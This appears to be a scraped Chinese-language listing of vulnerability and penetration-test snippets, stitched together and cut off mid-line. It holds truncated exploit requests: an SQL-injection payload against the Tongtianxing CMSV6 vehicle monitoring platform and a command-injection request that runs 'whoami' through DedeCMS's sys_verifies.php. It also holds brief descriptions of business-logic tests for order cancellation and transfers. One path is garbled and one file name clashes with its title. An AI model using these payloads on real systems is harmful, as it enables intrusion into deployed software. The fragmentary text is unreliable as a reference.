秃兔
通天星 CMSV6 车载定位监控平台 disable SQL注入漏洞
GET /edu security officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+268
【渗透文库】非金融订单取消场景业务逻辑测试
测试描述:通过抓包工具分析非金融订单取消业务场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应...
【渗透文库】转账场景业务逻辑测试
测试描述:通过抓包工具分析转账场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应的测试前置逐条...
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞
GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
